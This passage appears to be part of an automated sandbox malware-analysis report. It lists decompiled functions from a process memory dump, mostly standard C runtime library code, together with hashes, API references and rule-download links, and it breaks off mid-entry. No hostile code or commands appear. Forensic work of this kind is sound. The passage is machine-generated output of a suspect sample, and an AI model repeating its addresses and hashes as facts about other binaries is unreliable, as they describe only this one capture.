                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,0040BF91,00000001,00000000,00000000,?,?,?,?,0040BF91,00000000,?), ref: 004145D5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                                                        • Opcode ID: 09e858e427b0e1c327f07a847e7802bea4721f523367a191b6cf2f50b6d4ac3f
                                                                                                                                                                                                        • Instruction ID: 160bbb44cac5e1f2ae0d3363dbd79774e40217241fcf70b98eb72d27c848ece6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09e858e427b0e1c327f07a847e7802bea4721f523367a191b6cf2f50b6d4ac3f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57311231A00296EFDB20DF68C880AEE3BA6AF41310B14456AE5658B2A1D734DDC1DB68
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040B0A8 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040B0A8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040A999(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040AA89(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040AFAE(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040AEF3(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                                                                        0x0040b0ad
                                                                                                                                                                                                        0x0040b0b3
                                                                                                                                                                                                        0x0040b126
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040b0ba
                                                                                                                                                                                                        0x0040b0ba
                                                                                                                                                                                                        0x0040b0bd
                                                                                                                                                                                                        0x0040b0d8
                                                                                                                                                                                                        0x0040b0db
                                                                                                                                                                                                        0x0040b0fb
                                                                                                                                                                                                        0x0040b10d
                                                                                                                                                                                                        0x0040b0dd
                                                                                                                                                                                                        0x0040b0dd
                                                                                                                                                                                                        0x0040b0e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040b0e2
                                                                                                                                                                                                        0x0040b0f4
                                                                                                                                                                                                        0x0040b0f4
                                                                                                                                                                                                        0x0040b0e0
                                                                                                                                                                                                        0x0040b12b
                                                                                                                                                                                                        0x0040b12f
                                                                                                                                                                                                        0x0040b0bf
                                                                                                                                                                                                        0x0040b0d7
                                                                                                                                                                                                        0x0040b0d7
                                                                                                                                                                                                        0x0040b0bd

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction ID: e5f3382179eed6dfb443648d212c5bfb074451142b1919d7529dc229b969cfc5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1211757204014ABBCF125E85CC118EE3F22FB18354B148466FA1869171C73AC971AB8A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00408C46 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E00408C46(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x424f58);
				E0040D294(__ebx, __edi, __esi);
				_t28 = E0040B6F6(__ebx, __edx, __edi, _t30);
				_t13 =  *0x429528; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D68E(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x429610; // 0x20310f8
					 *((intOrPtr*)(_t29 - 0x1c)) = E00408C08(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00408CB0();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0040B6F6(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040C50B(_t25, _t26, 0x20);
				}
				return E0040D2D9(_t28);
			}







                                                                                                                                                                                                        0x00408c46
                                                                                                                                                                                                        0x00408c46
                                                                                                                                                                                                        0x00408c46
                                                                                                                                                                                                        0x00408c46
                                                                                                                                                                                                        0x00408c46
                                                                                                                                                                                                        0x00408c48
                                                                                                                                                                                                        0x00408c4d
                                                                                                                                                                                                        0x00408c57
                                                                                                                                                                                                        0x00408c59
                                                                                                                                                                                                        0x00408c61
                                                                                                                                                                                                        0x00408c85
                                                                                                                                                                                                        0x00408c87
                                                                                                                                                                                                        0x00408c8d
                                                                                                                                                                                                        0x00408c91
                                                                                                                                                                                                        0x00408c94
                                                                                                                                                                                                        0x00408c9f
                                                                                                                                                                                                        0x00408ca2
                                                                                                                                                                                                        0x00408ca9
                                                                                                                                                                                                        0x00408c63
                                                                                                                                                                                                        0x00408c63
                                                                                                                                                                                                        0x00408c67
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408c69
                                                                                                                                                                                                        0x00408c6e
                                                                                                                                                                                                        0x00408c6e
                                                                                                                                                                                                        0x00408c67
                                                                                                                                                                                                        0x00408c73
                                                                                                                                                                                                        0x00408c77
                                                                                                                                                                                                        0x00408c7c
                                                                                                                                                                                                        0x00408c84

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408C52
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408C69
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00408C77
                                                                                                                                                                                                        • __lock.LIBCMT ref: 00408C87
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3521780317-0
                                                                                                                                                                                                        • Opcode ID: e948ef43bc6d0fea28fe0fd9e17d146db1c90081b3465ccd6862736e49afce69
                                                                                                                                                                                                        • Instruction ID: b51ffff0edb98b04dd63b3cd1b026f9826a3eefa25728bed931f0ca9461acfd6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e948ef43bc6d0fea28fe0fd9e17d146db1c90081b3465ccd6862736e49afce69
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19F09631A45700DBE720BBA69602B4E73B0AF00714F55457FA491772C2CF7C9945DB6E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00408027 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                        			E00408027(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00404C44(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040B6F6(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040B6F6(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00404C1D(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00407DAC(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                                                                                                                                                        0x00408027
                                                                                                                                                                                                        0x00408027
                                                                                                                                                                                                        0x00408027
                                                                                                                                                                                                        0x00408027
                                                                                                                                                                                                        0x00408027
                                                                                                                                                                                                        0x0040802a
                                                                                                                                                                                                        0x00408030
                                                                                                                                                                                                        0x0040803e
                                                                                                                                                                                                        0x00408044
                                                                                                                                                                                                        0x0040804c
                                                                                                                                                                                                        0x00408058
                                                                                                                                                                                                        0x00408060
                                                                                                                                                                                                        0x00408068
                                                                                                                                                                                                        0x0040807c
                                                                                                                                                                                                        0x0040807e
                                                                                                                                                                                                        0x00408082
                                                                                                                                                                                                        0x00408087
                                                                                                                                                                                                        0x0040808d
                                                                                                                                                                                                        0x0040808f
                                                                                                                                                                                                        0x00408091
                                                                                                                                                                                                        0x00408094
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040809b
                                                                                                                                                                                                        0x0040808f
                                                                                                                                                                                                        0x00408082
                                                                                                                                                                                                        0x0040807c
                                                                                                                                                                                                        0x00408068
                                                                                                                                                                                                        0x0040809c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00404C44: __getptd.LIBCMT ref: 00404C4A
                                                                                                                                                                                                          • Part of subcall function 00404C44: __getptd.LIBCMT ref: 00404C5A
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408036
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00408044
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                                                                                                        • Opcode ID: 98f0aeeb77c2e327645e28fe54aec2940b1c5bfd76adb5b08a6fd92f4f7655af
                                                                                                                                                                                                        • Instruction ID: 13cd74c94cb0020edf19eb06701f3be937950f73df6bc4a66e904e6c8aba4919
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98f0aeeb77c2e327645e28fe54aec2940b1c5bfd76adb5b08a6fd92f4f7655af
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64017830C00301CAEF389F26C644AAEB7B4AF10311F25483FE6C0762D2CF399988CA49
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00401C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00401C70() {
				char _v44;
				char _v72;

				E00401030( &_v72, "vector<T> too long");
				E00401CB0( &_v44,  &_v72);
				E00404EFB( &_v44, 0x424850);
				return E00401070( &_v72);
			}





                                                                                                                                                                                                        0x00401c7e
                                                                                                                                                                                                        0x00401c8a
                                                                                                                                                                                                        0x00401c98
                                                                                                                                                                                                        0x00401ca8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMTD ref: 00401C8A
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401C98
                                                                                                                                                                                                          • Part of subcall function 00404EFB: RaiseException.KERNEL32(?,?,00406831,004021F3,?,?,?,?,00406831,004021F3,00424938,0042A754,004021F3,00000000,00000000), ref: 00404F3D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                                                        • API String ID: 1843230569-3788999226
                                                                                                                                                                                                        • Opcode ID: 28022983fe490c13e59e281ddfab54bc09295bd2c2159f5e8ece6efb2ebc1a0e
                                                                                                                                                                                                        • Instruction ID: 1ad155609a6ee44803b8ea556efcf72ea858947956c892ce0e6a44d4c2884f45
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28022983fe490c13e59e281ddfab54bc09295bd2c2159f5e8ece6efb2ebc1a0e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85E0C27191014C56C704F7E1D993DDEB33C9A14384F90023EF401320E1EE38BA06C6A8
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040F09E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                                                        			E0040F09E(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;

				_t19 = __edx;
				_push(0x10);
				_push(0x425168);
				E0040D294(__ebx, __edi, __esi);
				E00407AB0( *((intOrPtr*)(_t23 + 8)));
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				 *((intOrPtr*)(_t23 - 0x20)) = E0040ED52(__edx,  *((intOrPtr*)(_t23 + 8)));
				 *((intOrPtr*)(_t23 - 0x1c)) = _t19;
				 *(_t23 - 4) = 0xfffffffe;
				E0040F0DE();
				_t8 = _t23 - 0x20; // 0x40763d
				return E0040D2D9( *_t8);
			}





                                                                                                                                                                                                        0x0040f09e
                                                                                                                                                                                                        0x0040f09e
                                                                                                                                                                                                        0x0040f0a0
                                                                                                                                                                                                        0x0040f0a5
                                                                                                                                                                                                        0x0040f0ad
                                                                                                                                                                                                        0x0040f0b3
                                                                                                                                                                                                        0x0040f0c0
                                                                                                                                                                                                        0x0040f0c3
                                                                                                                                                                                                        0x0040f0c6
                                                                                                                                                                                                        0x0040f0cd
                                                                                                                                                                                                        0x0040f0d2
                                                                                                                                                                                                        0x0040f0dd

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __lock_file.LIBCMT ref: 0040F0AD
                                                                                                                                                                                                          • Part of subcall function 00407AB0: __lock.LIBCMT ref: 00407AD5
                                                                                                                                                                                                        • __ftelli64_nolock.LIBCMT ref: 0040F0BA
                                                                                                                                                                                                          • Part of subcall function 0040ED52: __fileno.LIBCMT ref: 0040ED72
                                                                                                                                                                                                          • Part of subcall function 0040ED52: __lseeki64.LIBCMT ref: 0040ED8F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __fileno__ftelli64_nolock__lock__lock_file__lseeki64
                                                                                                                                                                                                        • String ID: =v@
                                                                                                                                                                                                        • API String ID: 1600627125-3695915057
                                                                                                                                                                                                        • Opcode ID: 373f2e8c57d1887e0b88c94ccea2d322eeca6ec3899d9ccc3b68cba9830ad427
                                                                                                                                                                                                        • Instruction ID: e1d912a8cc31bce1b99d12f3382d8e4ae6671c27d07ba79569697640622028b0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 373f2e8c57d1887e0b88c94ccea2d322eeca6ec3899d9ccc3b68cba9830ad427
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3E09A31D00209AACF10EFA6D80279DB7B0AF44318F60817EF419762E2C77D5A569E5D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 017B8C28 Relevance: 2.0, Instructions: 1978COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.426778298.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_17b0000_b7687179.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4468ca2970fcd79d2114dbde997225d335321d1e681aa2040dbc90df302e4bd3
                                                                                                                                                                                                        • Instruction ID: 12bfcaf581d5aa1ef88e64679c2217f0266a4e4529ad43ab0a7068808db4192b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4468ca2970fcd79d2114dbde997225d335321d1e681aa2040dbc90df302e4bd3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E130078941204EFCB165BA1D951DDDB732FF99306B10846AEC113BFA8CA3B9982DF11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 017B8C38 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.426778298.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_17b0000_b7687179.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5ab5b6bf56ce2f0af901702765b1f01943bc950502d769fa8097654a5eb6a398
                                                                                                                                                                                                        • Instruction ID: b3a348af1fbee0ba35d6427c5a7bab2b70f87c849dd6e51077011c42a40393d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab5b6bf56ce2f0af901702765b1f01943bc950502d769fa8097654a5eb6a398
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87130078941204EFCB165BA1D951DDDB732FF99306B10846AEC113BFA8CA3B9982DF11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 017BEAF8 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.426778298.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_17b0000_b7687179.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 8q
                                                                                                                                                                                                        • API String ID: 0-596622023
                                                                                                                                                                                                        • Opcode ID: 20158ab007c29b4a87d476372a1846b256305fb2794e074f9ea1274f0334a1a2
                                                                                                                                                                                                        • Instruction ID: acac864b7256597190cfd812e2c29b3d3e88a7c8f397e4ea54b24b65867c1a21
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20158ab007c29b4a87d476372a1846b256305fb2794e074f9ea1274f0334a1a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF15D75700209DFDB24DF69E994AAEBBB2FF88310F148529E5069B361DB31EC41CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 017BDBA0 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.426778298.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_17b0000_b7687179.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 8q
                                                                                                                                                                                                        • API String ID: 0-596622023
                                                                                                                                                                                                        • Opcode ID: 1bee509b2ab5ee0ca8144eb8c05bc19443c71ed83cb45f388c1490326d7e054c
                                                                                                                                                                                                        • Instruction ID: 25529a88c2294376feecaf992629ea66809f72f18180ede9c93dd0e65b64c953
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bee509b2ab5ee0ca8144eb8c05bc19443c71ed83cb45f388c1490326d7e054c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20718D75E0060A8FDB24DFA9D4547AEBBF2BF89304F248529E405EB394DB709C46CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 017BEAEB Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.426778298.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_17b0000_b7687179.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 8q
                                                                                                                                                                                                        • API String ID: 0-596622023
                                                                                                                                                                                                        • Opcode ID: 0cb14d3fd6b00b06bf04d59fee50dc5d422e4efcc6a83ff103ad6d1d59f990f2
                                                                                                                                                                                                        • Instruction ID: 0dbe94d39785105d08b82d3dc378faabc3b8cb395685e69f6d9d6cdbbbef609b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb14d3fd6b00b06bf04d59fee50dc5d422e4efcc6a83ff103ad6d1d59f990f2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4981F974A00209DFCB14DF69E598A9DBBB2FF88310B158569E816AB365DB31EC41CF90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 017B2B6A Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.426778298.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_17b0000_b7687179.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 8cOj
                                                                                                                                                                                                        • API String ID: 0-2228003239
                                                                                                                                                                                                        • Opcode ID: c418ab312387ee75925eb13388f2a325087b3b5aa29992762dfa671e6b1238ff
